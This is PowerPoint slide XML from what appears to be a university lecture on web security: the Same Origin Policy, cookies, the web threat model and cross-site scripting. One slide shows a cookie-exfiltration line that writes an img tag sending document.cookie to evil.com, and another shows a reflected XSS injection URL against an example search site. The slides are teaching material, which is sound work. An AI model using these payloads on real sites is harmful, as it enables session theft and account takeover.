            <a:endParaRPr lang="en-US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312528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When the browser sends an HTTP request to origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which cookies are included?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apply the Same Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only cookies for that were set by origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that obey the path constraints</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319480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JavaScript?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1825625"/>
            <a:ext cx="11227755" cy="4837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JavaScript enables dynamic inclusion of objects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4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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="240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'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="240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sz="2400" dirty="0" err="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="240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=“http://example.com/dog.jpg'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="240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&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A webpage may include objects and JS code from multiple domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is not a Same Origin Policy violation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third-party code becomes a part of the first-party execution context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘https://code.jquery.com/jquery-2.1.3.min.js’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528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48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6F0C3-C660-476B-9CF5-D667BFD67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477FC-7D12-4C2E-ABDB-824174689D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HTTP Basics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>SQL Basics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Program Execution Basics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Buffer Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Patches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37170037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0EA11-81F0-4CE0-BAFA-870378025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Same Origin Policy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A4E2D8-021E-4D52-831A-0E71FE948A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Origin = &lt;protocol, hostname, port&gt;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The Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cannot access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from another origin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the case of cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domains are the origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webpages are the subjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are the objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2326657603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0EA11-81F0-4CE0-BAFA-870378025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Same Origin Policy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A4E2D8-021E-4D52-831A-0E71FE948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8375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Origin = &lt;protocol, hostname, port&gt;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The Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cannot access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from another origin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applies to JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JS from origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cannot access objects from origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g. the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, JS included in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can access all objects in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘https://code.jquery.com/jquery-2.1.3.min.js’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2012502489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C9CC24-B375-4226-BF2B-61FADBBA6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70A28E-4FD8-4474-A206-E15B5EBB3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084747"/>
            <a:ext cx="12188952" cy="3294207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9647E21-5366-4638-AC97-D8CD4111E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r="8214" b="45501"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="4473360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3925" y="2076450"/>
            <a:ext cx="10684151" cy="13451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Cross-Site Scripting (XSS)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171575" y="4473360"/>
            <a:ext cx="9469211" cy="8656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1100" kern="12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Threat Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="12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Reflected and Stored Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="12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Mitigations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12181860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on the Client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Your browser stores a lot of sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your browsing history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved usernames and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved forms (i.e. credit card numbers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies (especially session cookies)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Browsers try their hardest to secure this information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i.e. prevent an attacker from stealing this information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However, nobody is perfect ;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140785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4500" dirty="0"/>
              <a:t>Web Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>Model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Attacker’s goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal information from your browser (i.e. your session cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>victim.com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Browser’s goal: isolate code from different origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t allow the attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> private information from your browser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Attackers capability: trick you into clicking a link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May direct to a site controlled by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May direct to a legitimate site (but in a nefarious way…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19667436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 Model Assumptions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90688"/>
            <a:ext cx="10515600" cy="51673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Attackers cannot intercept, drop, or modify traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No man-in-the-middle attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS is trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No DNS spoofing or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kaminsky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TLS and CAs are trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Beast, POODLE, or stolen certs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripts cannot escape browser sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP restrictions are faithfully enforced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser/plugins are free from vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not realistic, drive-by-download attacks are very common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But this restriction forces the attacker to be more creative ;)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00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Cross-Site Scripting (XSS)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XSS refers to running code from an untrusted origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually a result of a document integrity violation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HTML documents are compositions of trusted, developer-specified objects and untrusted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allowing user input to be interpreted as document structure (i.e., elements) can lead to malicious code execution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Typical goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal authentication credentials (session IDs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or more targeted unauthorized actions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2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4500" dirty="0"/>
              <a:t>Cookie Exfiltration</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 41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document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250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.write</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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250" dirty="0" err="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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="http://evil.com/c.jpg?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="225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25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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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25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document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250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.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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25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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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25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'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="225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endParaRPr sz="225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lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>DOM API for cookie access (</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Often, the attacker's goal is to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> this property</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Exfiltration is restricted by SOP...somewhat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Suppose you click a link directing to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>JS from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> cannot read cookies for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>What about injecting code?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>If the attacker can somehow add code into victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>, the reading and exporting cookies is easy (see above)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100124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XSS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CDB41FE-C775-4168-A562-FF8191C9EB20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/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969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Vulnerable Website, Type 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168268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Suppose we have a search site, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.websearch.com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http://www.websearch.com/search?q=Christo+Wilson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67543" y="3893976"/>
            <a:ext cx="8870302" cy="27245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73763" y="3906415"/>
            <a:ext cx="8857862" cy="64070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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526972" y="4027713"/>
            <a:ext cx="3396342" cy="39810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923314" y="4027713"/>
            <a:ext cx="435429" cy="3981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710613" y="4881178"/>
            <a:ext cx="3506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Results for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Christo Wilson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10613" y="5544816"/>
            <a:ext cx="551792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Christo Wilson – Professor at Northeastern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.ccs.neu.edu/home/cbw/index.html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88898" y="2666967"/>
            <a:ext cx="2649894" cy="75266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144626" y="4827522"/>
            <a:ext cx="2136501" cy="56897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15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C9CC24-B375-4226-BF2B-61FADBBA6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70A28E-4FD8-4474-A206-E15B5EBB3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084747"/>
            <a:ext cx="12188952" cy="3294207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9647E21-5366-4638-AC97-D8CD4111E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r="8214" b="45501"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="4473360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3925" y="2076450"/>
            <a:ext cx="10684151" cy="13451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Hypertext Transfer Protocol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171575" y="4473360"/>
            <a:ext cx="9469211" cy="8656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1100" kern="12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Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="12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Same Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" kern="12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Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1100" kern="12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54932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Vulnerable Website, Type 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8817" y="2414246"/>
            <a:ext cx="11694366" cy="67559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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.websearch.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“http://img.com/nyan.jpg”/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567543" y="3893976"/>
            <a:ext cx="8870302" cy="27245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73763" y="3906415"/>
            <a:ext cx="8857862" cy="64070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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
